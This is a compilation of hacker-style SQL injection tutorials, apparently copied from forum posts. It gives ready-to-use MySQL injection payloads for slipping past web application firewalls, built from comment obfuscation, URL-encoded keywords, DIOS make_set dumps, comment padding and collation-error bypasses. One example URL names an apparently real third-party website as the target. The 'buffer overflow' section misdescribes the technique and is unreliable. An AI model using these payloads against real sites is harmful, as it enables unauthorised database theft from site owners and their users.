  1. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

  2. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()? 
  3. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
===========================================================
How to By Pass Columns:::
===========================================================
  1. group_concat(/*!column_name*/)
  2. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  3. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


========================================================================
URL enCoded By passing Table and columns::
===========================================================

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

========================================================================
illegal mix of Collations ByPass ::
========================================================================
bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

How To ByPass Precondition Failed In SQL injection



~~~~~~~~~~~~~With The Name Of ALLAH~~~~~~~~~~~~~~~~~~~~


Today we will Learn how to by Pass Precondition Failed in SQLI ..

Steps ::::

Lets Assume !!! :::

1-
www.site.com/php?id=1 order by 4--
2-
    www.site.com/php?id=-1 union select 1,2,3 --
  3-
    For example  2 is vlunerable Column::
now Going To perform Dios !!

4-
     www.site.com/php?id=-1 union select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,
0x3c6c693e,table_name,column_name)),@),3--

 Now Suppose It is showing us  Precondition Failed  


WAF byPass Method








----------------------------------------------------------------------------------------------------------------------
5-
  I test such Error  many Time ... When i Encode First character of  From Like that %66rom
it Works and Gives me Result ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

6-
 http://site.com/portfolio-detail.php?id=-11+ UNION SELECT 1,2,3,make_set(6,@:=0x0a,(/*!50000select*/(1) %66rom (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),5,6,7,8,9


We Have SuccessFully Bypassed This Precondition Failed WAF

Precondition Failed bypass













   :::::::::::::::::::::::::::::::Watch On Youtube::::::::::::::::::::::::::::::::::::::



------------------------------------------------------------------------------------------------------------------

AuthoR ::: MasOOD (Afghani)

Buffer overflows SQL Base injection



Today i am going to share with you how to By Pass Union select using Buffer overflows method.

What is Buffer Overflows::?
Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.
------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------

How To perForm ::
when we trying To inject a Site and at the Stage of union select we fail to bypass it ...
Then we use Buffer over Flow to bypass uion select. we Send much data that can over flow the memory of site.

When Overflow occurs it leaks some important data but in in case of SQL injection it will show us Vlunerable columns.

------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------
Assume the capacity of the Memory of site is
100 Characters.....So how can we Perform over flow By sending 100+ characters..
----------------------------------------------------------------------------------------------------------------------
www.site.com/php?id=1 union select 1,2,3--
union select by pass






WaF Detect our injection :
Lets Trying to Bypass it :
www.Site.com/php?id=1 /*!12345union*/ select 1,2,3

But this time Our Script is blocked by Hosting Team :D


buffer over flow





------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------

BY Passing Union Select By Buffer OverFlows ::

www.site.com/php?id=1 union %23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A select 1,2,3--
This time We have successfully by pass the Union select.....














-------------------------------------------------------------------------------------------------

Here We can use Any word ...Like ________ ,++++++++++,BBBBBBBBB ---

www.site.com/php?id=1 union %23+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%0A select 1,2,3--
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
                            :::::::::Watch  on Youtube :::::::::::::::::::


Author :: Masood (Afghani)

How To ByPass Illegal Mix Of Collations

How To ByPass Illegal Mix Of Collations

--------------------------------------------------------------------------------

                ::::::::Watch on Youtube :::::::::



-------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------

Solving this problem as an SQL Injector:


There are several ways you can bypass illegal mix of collations for operation 'union'.

using Cast function.
using convert function.
using HEX/ UNHEX functions.
using Compress/uncompress functions.
using encode/decode functions
using AES Encryption



Bypass illegal mix of collations with CAST function:


Once can bypass this error using CAST function.
cast() function inputs an expression of any type and give result value of given type
Syntax of cast()
Cast(Expression AS type)



http://website.com/page.php?id=1 union select 1,2,cast(@@version as binary)#


Bypass illegal mix of collations with AES_Encrypt() and AES_DECRYPT().


AES_ENCRYPT() AND AES_DECRYPT() can also be used to bypass this error.
AES_ENCRYPT() is used for impmenting ecnryption/decrypyion of given string using
Advance encryption Standard (AES). These functions ecnrypts with a 128 bit key lenght by default. AES_ENCRYPT uses that key with given string to encrypt that string and AES_DECRYPT() is used to decrypt that encrypted string with the key(which we set while encryption) to return the orignal string.

Syntax of AES_ENCRYPT() and AES_DECRYPT()

AES_ENCRYPT(given_string, key)
AES_DECRYPT(encrypted_string, key)

Bypass Example:

Suppose you are facing illegal mix of collations while fetching version() info,
lets take key as 1. your syntax would be like

http://website.com/page.php?id=1 union all select 1,2,AES_DECRYPT(AES_ENCRYPT(version(),1),1)#


Bypass illegal mix of collations with Convert function


Convert() also takes an expression/string any character set and convert it into specified character set.

Syntax of Convert() function:
Convert(given_string USING required_char_set)
Example:

http://website.com/page.php?id=1 union all select 1,2,convert(@@version using ascii)#

Bypass illegal mix of collations using ENCODE(), DECODE()


ENCODE() is also an encryption function of MySQL, it works same like
AES_ENCRYPT(), taking a string and encoding it with a provided key.
And similarly DECODE() function will decode that encoded string by using the key we provided while encryption.


Syntax of ENCODE() and DECODE():
ENCODE('string', key)
DECODE('encoded string', key)

Real time Example 

http://website.com/page.php?id=1 union all select 1,2,decode(encode(@@version,1),1)#

Bypass illegal mix of collations with COMPRESS(), UNCOMPRESS() functions


Compress() functions compresses a string and give the result as  binary string.
and that compressed string can be uncompressed by uncompressed() function later.

Syntax of Compress() and Uncompress(): 
compress('given_string')
uncompress('compressed string')

Real Time Example:

http://website.com/page.php?id=1 union all select 1,2,uncompress(compress(@@version))# 

Bypass illegal mix of collations using HEX() and UNHEX() functions


HEX() functions take a string and results hexadecimal string representation of that given string with each character of given string converted in two hexadecimal digits and the UNHEX() reverse this hexadecimal string back to the Original string.
Syntax of Hex() and Unhex():
HEX('given string')
UNHEX('haxadecimal_of_string')

Real time Example:

http://website.com/page.php?id=1 union all select 1,2,unhex(hex(@@version))#

Auth0R ::: Ahsan Shabbir (God SQLI)